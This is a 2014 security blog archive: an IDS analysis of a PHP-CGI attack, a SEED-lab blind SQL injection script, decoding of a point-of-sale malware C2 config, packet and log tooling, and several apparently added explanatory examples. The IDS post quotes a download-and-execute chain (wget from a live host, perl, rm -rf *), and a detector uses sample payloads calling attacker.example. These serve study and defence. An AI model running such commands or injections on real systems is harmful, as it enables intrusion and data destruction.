Showing posts from April, 2014

US Cyber Challenge Scoreboard Analysis

Prior to the competition closing on April 31, 2014 for the latest US Cyber Challenge, located at http://uscc.cyberquests.org, I thought I would do a quick analysis of the users who appear on the scoreboards.

Looking at the number of times the same user appears:

Appearances  User
7            jt6
6            baldwintm
6            thepcnerd
5            devnull
5            jgbrigden
5            jimkoz23
5            jmoore
5            linuz
5            ltomczak
5            mkaplan
5            sonken
5            webdevgirl
5            wiredaemon

Only displaying the top 13 with 5 or more appearances on the scoreboards.

Another way to look at the numbers is below: the number of users that have appeared 7 times, 6 times, and so on.

Number of Users  Total Appearances
1                7 times
2                6 times
10               5 times
15               4 times
25               3 times
100              2 times
909              1 time

I am a fan of the US Cyber Challenges and congratulate those who support it, fund it, and promote it.  Keep the challenges coming.

Examining IDS Logs for PHP-CGI Query String Vulnerabilities

I noticed a few high severity events related to PHP-CGI Query String vulnerabilities going through the IDS and bouncing off of the webserver.

The first item was identifying it in the IDS as one of the below events:
ET Web_Specific_Apps PHP-CGI query string parameter vulnerability - CVE2012-1823

I am not necessarily going to focus on the exploit.  I want to focus on the information in the below screenshot:

As you can see, part of the attack is to execute the following commands through PHP:
cd /tmp - Change to the /tmp directory
wget http://www.macam-informasi.com/bibah/bot.txt - Download using wget the bot.txt
perl bot.txt  - Use perl and execute the text file bot.txt that was previously downloaded
rm -rf bot.txt - Remove the bot.txt if in the process of execution perl bot.txt terminates
rm -rf bot.txt* - Remove anything that starts with bot.txt possibly due to temporary files that are created
rm -rf *.txt - Remove any temporary *.txt files that were created
rm -rf * - Remove any files…
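
The command chain above is a useful thing to look for in your own web logs, independent of which IDS signature fired first. The script below is an added example written for this post, not the IDS output or any code from the original: it takes constructed (client, payload) records, undoes URL encoding, and reports which stages of the download-and-execute chain (cd into /tmp, fetch, run the interpreter, rm -rf cleanup) appear in each request. The host attacker.example and the client addresses are placeholders, not the hosts from the event.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample records, not lines from the post's IDS: (client, payload),
# where payload is the request query string or body as captured by the sensor.
SAMPLE_REQUESTS = [
    ("203.0.113.7",
     "cd /tmp;wget http://attacker.example/bot.txt;perl bot.txt;rm -rf bot.txt*;rm -rf *.txt"),
    ("198.51.100.3",
     "cd%20%2Ftmp%3Bwget%20http%3A%2F%2Fattacker.example%2Fbot.txt%3Bperl%20bot.txt"),
    ("192.0.2.9", "page=about&lang=en"),
]

# One regex per stage of the chain the post lists; order is kept for reporting.
STAGES = {
    "staging_dir": re.compile(r"\bcd\s+/tmp\b"),
    "download":    re.compile(r"\b(?:wget|curl)\s+\S+"),
    "execute":     re.compile(r"\b(?:perl|sh|bash|python)\s+\S+"),
    "cleanup":     re.compile(r"\brm\s+-rf\b"),
}


def decode_payload(payload: str, rounds: int = 3) -> str:
    """Undo URL encoding until the text stops changing (handles double encoding)."""
    for _ in range(rounds):
        decoded = unquote_plus(payload)
        if decoded == payload:
            break
        payload = decoded
    return payload


def matched_stages(payload: str) -> list:
    """Names of the chain stages present in one decoded payload."""
    text = decode_payload(payload)
    return [name for name, rx in STAGES.items() if rx.search(text)]


def find_suspicious(records, min_stages: int = 2) -> list:
    """Return (client, stages) for every record showing at least min_stages stages.

    Requiring two stages avoids flagging a lone 'rm -rf' or 'wget' in normal traffic.
    """
    hits = []
    for client, payload in records:
        stages = matched_stages(payload)
        if len(stages) >= min_stages:
            hits.append((client, stages))
    return hits


if __name__ == "__main__":
    for client, stages in find_suspicious(SAMPLE_REQUESTS):
        print("%s: %s" % (client, ", ".join(stages)))
```

Feeding it real data is a matter of building the (client, payload) pairs from your access log or IDS export; the decode step matters because the chain is almost always URL-encoded at least once when it arrives.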

Python Raw Socket to Create ICMP Packet

Had a challenge to recreate a raw packet from bytes given in a text file.  Used python to create the raw socket.  The commented code is taking it from text to hex.

#!/usr/bin/env python

import socket
import struct

rawSocket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x800))
rawSocket.bind(("vmnet1", socket.htons(0x0800)))


#hexBytes = "000c29213dd1005056c00001080045000054b40a00004001905c0a0a112d0a0a11020000364e16070001c3190152013b030008090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637"

#counter = 1
#for letter in hexBytes:
#    if counter == 1:
#        firstLetter = letter
#        counter = 2
#    elif counter == 2:
#        print "\\x" + firstLetter + letter
#        counter = 1

hexPacket = "\x00\x0c\x29\x21\x3d\xd1\x00\x50\x56\xc0\x00\x01\x08\x00\x45\x00\x00\x54\xb4\x0a\x00\x00\x40\x01\x90\x5c\x0a\x0a\x11\x2d\x0a\x0a\x11\x02\x00\x00\x36\x4e\x16\x07\x00\x01\xc3\x19\x01\x52\x01\x3b\x03\x00\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x…
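
Before putting a hand-built frame on the wire it is worth checking that the bytes actually parse as the packet you think they are. The following is an added example, not code from the original post: it takes the same hex text the post starts from (Ethernet + IPv4 + ICMP echo reply), converts it to bytes with bytes.fromhex instead of the commented letter-pairing loop, dissects the three headers with struct, and verifies both the IPv4 header checksum and the ICMP checksum with the RFC 1071 one's-complement sum. Only the parsing is shown; sending still needs a PF_PACKET socket and root as in the post.

```python
import struct

# Sample input: the hex text the post converts into a raw frame, split by header
# for readability (Ethernet 14 bytes, IPv4 20 bytes, ICMP 8 + 56 bytes).
FRAME_HEX = (
    "000c29213dd1" "005056c00001" "0800"           # Ethernet: dst MAC, src MAC, type
    "45000054b40a00004001905c0a0a112d0a0a1102"     # IPv4 header (checksum 0x905c)
    "0000364e16070001"                             # ICMP: type 0, code 0, csum, id, seq
    "c3190152013b0300"                             # ICMP payload: timestamp
    "08090a0b0c0d0e0f1011121314151617"             # ICMP payload: 0x08..0x37 filler
    "18191a1b1c1d1e1f2021222324252627"
    "28292a2b2c2d2e2f3031323334353637"
)


def hex_text_to_bytes(text: str) -> bytes:
    """Turn hex text (whitespace and newlines allowed) into raw bytes."""
    return bytes.fromhex("".join(text.split()))


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum used by IPv4 and ICMP.

    Run over a header that already contains its checksum field, the result is 0
    when the checksum is correct.
    """
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def mac_str(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)


def parse_frame(raw: bytes) -> dict:
    """Dissect Ethernet/IPv4/ICMP and report the fields plus checksum validity."""
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", raw[:14])
    if ethertype != 0x0800:
        raise ValueError("not an IPv4 frame: ethertype 0x%04x" % ethertype)
    ip = raw[14:]
    ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4               # header length in bytes
    if proto != 1:
        raise ValueError("not ICMP: IP protocol %d" % proto)
    icmp = ip[ihl:total_len]                 # ICMP header + payload, no Ethernet padding
    icmp_type, icmp_code, _icmp_csum, icmp_id, icmp_seq = struct.unpack("!BBHHH", icmp[:8])
    return {
        "dst_mac": mac_str(dst_mac),
        "src_mac": mac_str(src_mac),
        "src_ip": ".".join(str(b) for b in src),
        "dst_ip": ".".join(str(b) for b in dst),
        "ttl": ttl,
        "ip_checksum_ok": inet_checksum(ip[:ihl]) == 0,
        "icmp_type": icmp_type,              # 0 = echo reply, 8 = echo request
        "icmp_code": icmp_code,
        "icmp_id": icmp_id,
        "icmp_seq": icmp_seq,
        "icmp_checksum_ok": inet_checksum(icmp) == 0,
        "payload_len": len(icmp) - 8,
    }


if __name__ == "__main__":
    for key, value in parse_frame(hex_text_to_bytes(FRAME_HEX)).items():
        print("%-17s %s" % (key, value))
```

If you edit the payload or addresses by hand, both checksum flags will go false, which is exactly what the receiving stack will conclude before silently dropping the packet.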

SQL Injection Script written for SEED Labs

SEED Labs are located here: http://www.cis.syr.edu/~wedu/seed/
These are great labs to learn more about cyber security and penetration testing.

The below script was developed to demonstrate SQL Injection on the phpBB lab that they provide.  Though the lab itself does not require this it was a great script to write.  With the script I extract the passwords for the 5 users that are found on the system.

This script could be made more efficient by replacing the brute force of each letter with conditional statements.

#!/usr/bin/env python

import os
import re
from socket import *
from time import ctime

BUFSIZE=1024

# Change the hostInput based on your IP Address of the SEED Installation of Ubuntu 9.
hostInput = '172.16.108.140'

userNames = ['admin', 'alice', 'bob', 'carol', 'ted'] 
#userNames = ['ted'] 

userPassword = ''
contentLength = 63

for userName in userNames:
    for number in range(1,30):
        contentLengthTotal = contentLength + number

        fo…
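
The reason the lab's phpBB login can be walked one character at a time is that user input is spliced into the SQL text. The example below is added here and is not the lab's code or the script above: it stands up an in-memory SQLite table with the five account names from the post (the passwords are made up, not the lab's), then shows the same login check written two ways, string-built and parameterised, against a normal login and against a tautology injection.

```python
import sqlite3

# Constructed sample users: the five names the post mentions, with made-up
# passwords (the SEED lab's real passwords are deliberately not reproduced).
SAMPLE_USERS = [
    ("admin", "pw-admin-0"),
    ("alice", "pw-alice-1"),
    ("bob",   "pw-bob-2"),
    ("carol", "pw-carol-3"),
    ("ted",   "pw-ted-4"),
]


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the phpBB user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """String-built query: whatever the user types becomes part of the SQL."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_hardened(conn, username: str, password: str) -> list:
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def compare(username: str, password: str) -> dict:
    """Run both versions on the same input so the difference is visible."""
    conn = build_db()
    return {
        "vulnerable": sorted(login_vulnerable(conn, username, password)),
        "hardened":   sorted(login_hardened(conn, username, password)),
    }


if __name__ == "__main__":
    print("normal login :", compare("admin", "pw-admin-0"))
    # The classic tautology: AND binds tighter than OR, so every row matches.
    print("tautology    :", compare("admin", "' OR '1'='1"))
```

Every boolean trick the per-letter script relies on (a condition that is either true or false about the stored password) works for the same reason the tautology works; once the comparison is bound as a parameter, the condition is just a string that no password equals, and the query returns nothing.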

ASCII to Hex Encoder - Another Version of a Previous Encoder

#!/bin/bash

# Usage: ./script-name <ASCII FILE> | tr -d '\n' > <ENCODED FILE>
# Take a file as the input

testInput=$1

function encode {

    case ${1} in
        "") echo "\x20" ;; "!") echo "\x21" ;; "\"") echo "\x22" ;;
        "#") echo "\x23"    ;; "$") echo "\x24" ;; "&") echo "\x26" ;;
        "%") echo "\x25"    ;; "'") echo "\x27" ;; "(") echo "\x28" ;;
        ")") echo "\x29" ;; '*') echo '\x2a' ;; '+') echo '\x2b' ;; 
        ',') echo '\x2c' ;; '-') echo '\x2d' ;; '.') echo '\x2e' ;; 
        "/") echo '\x2f' ;; '0') echo '\x30' ;; '1') echo '\x31' ;; 
        '2') echo '\x32' ;; '3') echo '\x33'…

Python - XOR a File

Origin of this script is from http://stackoverflow.com/questions/5037762/xor-each-byte-with-0x71

#!/usr/bin/python

# Read the input as raw bytes (binary mode avoids newline translation on Windows)
data = bytearray(open("file.txt", "rb").read())
for i in range(len(data)):
    data[i] ^= 0x71      # XOR every byte with the single-byte key

open("xorFile.txt", "wb").write(data)

Python Parser for CaptureBAT Output

From the command line where CaptureBAT is running I use the following syntax:
"CaptureBAT.exe -c -n -l outputCaptureBat.log"

Then copy the log file where the python script is located.

#!/usr/bin/python

import sys

def parseFile(file, filter, specific):
    duplicate3rdItem=""
    duplicate4thItem=""

    for line in file:
        items=line.split(',')
        if items[1] == filter and items[2] == specific:
            # Print a line only when it is not an exact repeat of the previous
            # kept line, i.e. when either the process or the target differs
            if items[3] != duplicate3rdItem or items[4] != duplicate4thItem:
                print items[0] + " " + items[3] + " " + items[4].rstrip()
                duplicate3rdItem=items[3]
                duplicate4thItem=items[4]


if len(sys.argv) >= 2:
    outputFile='outputCaptureBat.log'
    parseValues = [ ['"file"', '"Write"', 'Files Written'], ['"file"', '"Delete"', 'Files Deleted'],
           ['"process"', '"Created"', 'Processes Created'], ['"…
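
A complete version of the same idea, added here as an example rather than taken from the post: it uses the csv module so the quoted fields compare cleanly (the script above has to match '"file"' with the quotes still attached), groups events under the same labels the post's parseValues list starts with, and drops every repeat of a (process, target) pair rather than only consecutive ones. The log lines are constructed to follow the five-column layout the post's script indexes (timestamp, type, action, process, target) and are not real CaptureBAT output.

```python
import csv
import io

# Constructed sample in the column layout the post's script indexes:
# timestamp, type, action, process, target. Not real CaptureBAT output.
SAMPLE_LOG = r'''
"1/4/2014 10:01:02.100","process","Created","C:\Windows\explorer.exe","C:\Users\lab\sample.exe"
"1/4/2014 10:01:02.350","file","Write","C:\Users\lab\sample.exe","C:\Users\lab\AppData\Local\Temp\drop.dll"
"1/4/2014 10:01:02.360","file","Write","C:\Users\lab\sample.exe","C:\Users\lab\AppData\Local\Temp\drop.dll"
"1/4/2014 10:01:02.400","file","Write","C:\Users\lab\sample.exe","C:\Users\lab\AppData\Local\Temp\run.bat"
"1/4/2014 10:01:03.000","file","Delete","C:\Users\lab\sample.exe","C:\Users\lab\AppData\Local\Temp\run.bat"
"1/4/2014 10:01:03.100","process","Terminated","C:\Users\lab\sample.exe","C:\Users\lab\AppData\Local\Temp\run.bat"
'''.strip()

# The (type, action, label) triples the post's parseValues list starts with.
PARSE_VALUES = [
    ("file", "Write", "Files Written"),
    ("file", "Delete", "Files Deleted"),
    ("process", "Created", "Processes Created"),
]


def parse_capturebat(text: str, parse_values=PARSE_VALUES) -> dict:
    """Group log rows by label, keeping the first sighting of each (process, target)."""
    wanted = {(kind, action): label for kind, action, label in parse_values}
    results = {label: [] for _, _, label in parse_values}
    seen = set()
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 5:
            continue                          # blank or malformed line
        timestamp, kind, action, process, target = row[:5]
        label = wanted.get((kind, action))
        if label is None:
            continue                          # event type we are not reporting on
        key = (label, process, target)
        if key in seen:
            continue                          # duplicate of an earlier event
        seen.add(key)
        results[label].append((timestamp, process, target))
    return results


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for label, events in parse_capturebat(text).items():
        print(label)
        for timestamp, process, target in events:
            print("  %s %s -> %s" % (timestamp, process, target))
```

Run it with the log file as the first argument, or with no argument to see the constructed sample; adding another (type, action, label) triple to PARSE_VALUES is all it takes to report a further event class.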

Python - base64 Decode and XOR brute force Config File Leading to C2 Server

This script is the same as the one below, except that it brute forces the XOR key instead of relying on knowing that the XOR key is 0xe8.

#!/usr/bin/python

# Malware found on virus total
# Modified variant of the Project Hook point-of-sale malware
# Fetches an obfuscated file containing additional C&C domains:
# http://www.localhost0x2.net/config/config_01.bin
# File content is XOR'ed using 0xE8, then Base64 encoded.

# Original File Content - config_01.bin
# gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2c
# gJycmNLHx4Sdi4ORxYydhZibxoqBkg==

import base64

# Take the base64 given and decode it and add it to a list
base64info = "gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2cgJycmNLHx4Sdi4ORxYydhZibxoqBkg=="
decodedInfo = base64.b64decode(base64info)
infoDecoded = decodedInfo.encode("hex")

# Take the list and make the values of the list a hex number as a string
info = []
counter = 1
for letter in infoDecoded:
    if (counter == 1):
        listItem = '0x' + letter
        counter = 2
    elif (counter…

Python - base64 Decode and XOR with 0xe8 Config File Leading to C2 Server

#!/usr/bin/python

# Malware found on virus total
# Modified variant of the Project Hook point-of-sale malware
# Fetches an obfuscated file containing additional C&C domains:
# http://www.localhost0x2.net/config/config_01.bin
# File content is XOR'ed using 0xE8, then Base64 encoded.

# Original File Content - config_01.bin
# gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2c
# gJycmNLHx4Sdi4ORxYydhZibxoqBkg==

import base64

# Take the base64 given and decode it and add it to a list
base64info = "gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2cgJycmNLHx4Sdi4ORxYydhZibxoqBkg=="
decodedInfo = base64.b64decode(base64info)
infoDecoded = decodedInfo.encode("hex")

# Take the list and make the values of the list a hex number as a string
info = []
counter = 1
for letter in infoDecoded:
    if (counter == 1):
        listItem = '0x' + letter
        counter = 2
    elif (counter == 2):
        listItem = listItem + letter
        info.append(listItem)
        counter = 1


# Define the new list of where the hex w…
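
The three XOR posts above (XOR a file with 0x71, brute force the config key, decode the config with the known 0xe8) all reduce to one byte-wise XOR plus a way of deciding which key produced real text. The following is an added example and not any of the posts' own code: it Base64-decodes the two config lines quoted above, tries all 256 single-byte keys, scores each candidate by how many bytes look like URL text, and also exposes the known-key and file variants of the same operation. The scoring alphabet is an assumption that fits a config holding URLs.

```python
import base64
import string

# Sample input: the two Base64 lines quoted in the post, joined the way the
# post's script joins them (second line directly after the first).
SAMPLE_B64 = "gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2c" "gJycmNLHx4Sdi4ORxYydhZibxoqBkg=="

# Bytes expected in a config that holds URLs: letters, digits, URL punctuation.
# This alphabet is an assumption for scoring, not something the malware defines.
TEXT_BYTES = frozenset((string.ascii_letters + string.digits + " .:/-_").encode())


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (the operation all three posts apply)."""
    return bytes(b ^ key for b in data)


def xor_file(src_path: str, dst_path: str, key: int) -> None:
    """File-to-file version, equivalent to the XOR-a-file post."""
    with open(src_path, "rb") as fh:
        data = fh.read()
    with open(dst_path, "wb") as fh:
        fh.write(xor_bytes(data, key))


def text_score(data: bytes) -> int:
    """How many bytes fall inside the expected text alphabet."""
    return sum(1 for b in data if b in TEXT_BYTES)


def brute_force_xor(data: bytes):
    """Try all 256 keys; return (key, plaintext) with the highest text score."""
    best_key, best_score = 0, -1
    for key in range(256):
        score = text_score(xor_bytes(data, key))
        if score > best_score:
            best_key, best_score = key, score
    return best_key, xor_bytes(data, best_key)


def decode_config(b64_text: str, key=None):
    """Base64-decode, then XOR with the given key or brute-force it when key is None."""
    raw = base64.b64decode(b64_text)
    if key is None:
        return brute_force_xor(raw)
    return key, xor_bytes(raw, key)


if __name__ == "__main__":
    key, plain = decode_config(SAMPLE_B64)
    print("recovered key 0x%02x" % key)
    print(plain.decode("ascii", "replace"))
```

With a scoring alphabet this narrow a wrong key shows up immediately, because characters like ':' and '/' in a URL map outside the alphabet for every key except the right one; for configs that are not plain URLs you would widen the alphabet or score on expected keywords instead.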

Rewrite of Unquoted Path Vulnerability Script

$hash = @{
"FullPath" = "ServiceValue"}
$hash.keys | % {
    $name = $hash.Item($_)
    if(Test-Path ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name)){
        $info = (Get-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name) -Name ImagePath -EA "SilentlyContinue").ImagePath
        #Check for quotes
        if ($info -eq "`"$_`""){
            #For testing: Write-Host "Has quotes!" $name $info
        }
        #Check for no quotes
        elseif ($info -eq $_){
            Write-Host "NO QUOTES!" $info #For Testing
            Set-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name) -Name ImagePath -Value "`"$_`""
        }
    }
}